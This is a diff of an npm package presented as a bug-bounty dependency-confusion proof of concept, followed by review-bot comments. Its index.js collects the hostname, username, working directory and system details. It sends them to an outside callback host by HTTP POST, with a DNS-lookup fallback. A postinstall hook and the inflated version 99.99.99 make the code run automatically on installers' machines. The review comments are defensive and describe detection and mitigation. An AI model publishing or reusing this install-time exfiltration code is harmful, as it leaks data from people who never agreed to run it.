test-bugbounty-package-9 99.99.99
- package/index.js +87 -0
- package/package.json +15 -0
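--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,87 @@
+// Bug Bounty - Dependency Confusion PoC
+// Package: test-bugbounty-package-9
+// Contact: dd_06@wearehackerone.com
+
+const dns = require('dns');
+const os = require('os');
+const http = require('http');
+const https = require('https');
+
+function toHex(input) {
+return Buffer.from(input, 'utf8').toString('hex');
+}
+
+const info = {
+pkg: "test-bugbounty-package-9",
+hostname: os.hostname(),
+user: os.userInfo().username,
+cwd: process.cwd(),
+platform: os.platform(),
+arch: os.arch(),
+nodeVersion: process.version,
+timestamp: new Date().toISOString()
+};
+
+const CALLBACK_URL = 'https://deepbounty.dd06-dev.fr/cb/383a550b-4aff-4552-b849-b6ffec1d413d';
+
+function sendDnsPayload() {
+try {
+const parsed = new URL(CALLBACK_URL);
+const baseDomain = parsed.hostname;
+const uuidLabel = (parsed.pathname.split('/').filter(Boolean).pop() || 'cb').replace(/[^a-zA-Z0-9]/g, '');
+
+const hexPayload = toHex(JSON.stringify(info));
+const chunks = hexPayload.match(/.{1,50}/g) || [];
+
+if (!chunks.length || !baseDomain) return;
+
+chunks.forEach((chunk, index) => {
+// Reconstruct hostname: index-total.uuid.chunk.domain
+const hostname = `${index}-${chunks.length}.${uuidLabel}.${chunk}.${baseDomain}`;
+
+// Jitter requests to avoid flooding local resolver
+setTimeout(() => {
+dns.lookup(hostname, (err) => { /* ignore result */ });
+}, index * 200);
+});
+} catch (e) {}
+}
+
+function sendHttpPayload() {
+try {
+const parsed = new URL(CALLBACK_URL);
+const postData = JSON.stringify(info);
+const lib = parsed.protocol === 'https:' ? https : http;
+
+const req = lib.request(CALLBACK_URL, {
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': Buffer.byteLength(postData)
+},
+timeout: 3000
+}, (res) => {
+res.on('data', () => {}); // Consume stream
+});
+
+// Fallback on Network Error
+req.on('error', (e) => {
+sendDnsPayload();
+});
+
+// Fallback on Timeout
+req.on('timeout', () => {
+req.destroy();
+sendDnsPayload();
+});
+
+req.write(postData);
+req.end();
+
+} catch (e) {
+sendDnsPayload();
+}
+}
+
+// Start with HTTP; it will fallback to DNS if needed.
+sendHttpPayload();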
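Review bot: The top-level `info` object transmits more than a dependency-confusion proof needs: alongside the package name it carries `os.userInfo().username` and `process.cwd()`, and `sendDnsPayload()` hex-encodes the same JSON into lookup labels under the callback host, so the values are also visible to every resolver on the path. Because `sendHttpPayload()` is called unconditionally at module load and package.json names this file as both `main` and the `postinstall` script, the transmission happens at install time and again on any `require` of the package. When triaging a host that installed this version, treat those fields as disclosed; the observable signals are a JSON POST to the `CALLBACK_URL` host and a burst of lookups shaped `index-total.uuid.chunk.domain` spaced 200 ms apart. The header comment does not say any of this and should, e.g. `// Sends hostname, username, cwd, platform, arch and Node version to CALLBACK_URL at load time; falls back to DNS lookups on error or timeout.`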
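--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,15 @@
+{
+"name": "test-bugbounty-package-9",
+"version": "99.99.99",
+"description": "Bug Bounty package - If you see this, your organization may be vulnerable to dependency confusion",
+"main": "index.js",
+"scripts": {
+"postinstall": "node index.js"
+},
+"keywords": [
+"security",
+"bug-bounty",
+"dependency-confusion"
+],
+"license": "MIT"
+}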
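Review bot: The `scripts` entry `"postinstall": "node index.js"` makes npm run the package's code during installation with the installing user's privileges, before any consumer imports it, and the manifest carries no `author`, `repository` or `homepage` field by which the publisher could be verified. The version `99.99.99` is presumably chosen to outrank an internal package of the same name when a resolver compares versions across registries, which matches the `dependency-confusion` keyword. On the consuming side the exposure is closed by installing with `--ignore-scripts`, by publishing internal packages under a scope whose registry is pinned in `.npmrc`, and by installing from a committed lockfile with `npm ci` so a higher public version is not picked up silently.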